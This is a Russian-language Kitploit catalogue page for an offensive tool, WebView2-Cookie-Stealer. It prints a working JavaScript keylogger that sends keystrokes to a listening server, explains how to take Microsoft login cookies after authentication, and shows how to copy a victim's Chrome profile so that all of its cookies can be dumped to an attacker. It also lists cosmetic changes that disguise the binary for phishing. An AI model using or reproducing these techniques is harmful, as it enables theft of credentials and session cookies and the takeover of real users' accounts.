Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
WebView2-Cookie-Stealer — Внедряет JavaScript-кейлоггер на страницы WebView2 для захвата нажатий клавиш и извлечения файлов cookie из сеансов аутентификации Microsoft с помощью HTTP GET-запросов. | Kitploit
Инструменты/GitHubGitHub/mrd0x/webview2-cookie-stealer
Атаки на ПаролиЭксплуатация веб-приложенийЭксфильтрация данныхСбор информацииФишинг
GitHubmrd0x/webview2-cookie-stealer

WebView2-Cookie-Stealer

Внедряет JavaScript-кейлоггер на страницы WebView2 для захвата нажатий клавиш и извлечения файлов cookie из сеансов аутентификации Microsoft с помощью HTTP GET-запросов.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
266584 лет назадПроверено Kitploit

Статья в блоге

Пожалуйста, прочитайте эту статью в блоге, чтобы получить больше информации.

Исходный код

Этот код является модифицированной версией кода WebView2 от Microsoft. Текущий код можно почистить и значительно улучшить.

Демонстрация

Пример запуска

Пример использования

Использование

Протестировано на Windows 10 и 11.

При выполнении бинарного файла загружается https://office.com/login. На каждую страницу внедряется JavaScript-кейлоггер, и нажатия клавиш отправляются на http://127.0.0.1:8080. Кроме того, после успешной аутентификации пользователя файлы cookie для login.microsoftonline.com кодируются в base64 и отправляются на http://127.0.0.1:8080 через HTTP GET запрос.

Изменение JavaScript

Если вы хотите изменить JavaScript, код, который нужно изменить, показан ниже на строке 1096 в AppWindow.cpp.

root@kitploit:~
coreWebView2->AddScriptToExecuteOnDocumentCreated(L"var link = \"http://127.0.0.1:8080/keylog?k=\";var l = \"\";document.onkeypress = function (e){l += e.key;var req = new XMLHttpRequest();req.open(\"GET\",link.concat(l), true);req.send();}", nullptr);

Кража файлов cookie Chrome

WebView2 позволяет запускать с существующей папкой пользовательских данных (UDF) вместо создания новой. UDF содержит все пароли, сессии, закладки и т.д. UDF Chrome находится по пути C:\Users\<username>\AppData\Local\Google\Chrome\User Data. Мы можем просто указать WebView2 запустить экземпляр, используя этот профиль, и после запуска извлечь все файлы cookie и передать их на сервер атакующего.

Единственная загвоздка в том, что WebView2 ищет папку с именем EBWebView вместо User Data (непонятно почему). Скопируйте папку User Data и переименуйте её в EBWebView.

Необходимые изменения

  • В строке 41 в app.cpp:

    • Замените std::wstring userDataFolder(L""); на std::wstring userDataFolder(L"C:\\Path\\To\\Temp");
    • Указанная папка должна содержать папку EBWebView, из которой WebView2 будет читать.
  • В строке 40 в ScenarioCookieManagement.cpp:

    • Замените GetCookiesHelper(L"https://login.microsoftonline.com"); на GetCookiesHelper(L"");

Когда GetCookiesHelper вызывается без указания веб-сайта, он извлекает все файлы cookie.

Примечание: Это не будет работать с текущим приложением, если имеется большое количество файлов cookie, так как приложение отправляет их через GET запрос, который имеет ограничение по длине.

Важные функции

Если вы хотите внести изменения в бинарный файл, ниже вы найдёте информацию о важных функциях.

  • AppStartPage.cpp - функция GetUri() содержит URL, который загружается при выполнении бинарного файла.
  • ScenarioCookieManagement.cpp - функция SendCookies() содержит IP-адрес и порт, куда отправляются файлы cookie.
  • AppWindow.cpp - функция CallCookieFunction() ждёт, пока URL начнётся с https://www.office.com/?auth=, и вызывает ScenarioCookieManagement::GetCookiesHelper(L"https://login.microsoftonline.com")
  • WebView2APISample.rc - косметические изменения
    • Удалите строку меню, установив все значения POPUP в "".
    • Измените IDS_APP_TITLE и IDC_WEBVIEW2APISAMPLE. Это имя приложения в строке заголовка.
    • Измените IDI_WEBVIEW2APISAMPLE, IDI_WEBVIEW2APISAMPLE_INPRIVATE и IDI_SMALL. Они указывают на файл , который является иконкой этого приложения.
Скачать инструмент
.ico
  • Toolbar.cpp - itemHeight должен быть установлен в 0, чтобы удалить верхнее меню. В этом коде это уже сделано.
  • AppWindow.cpp - LoadImage() следует закомментировать. Это скрывает синее заставное изображение. В этом коде это уже сделано.
  • App.cpp - new AppWindow(creationModeId, WebViewCreateOption(), initialUri, userDataFolder, false); измените последнее значение параметра на true. Это скрывает панель инструментов. В этом коде это уже сделано.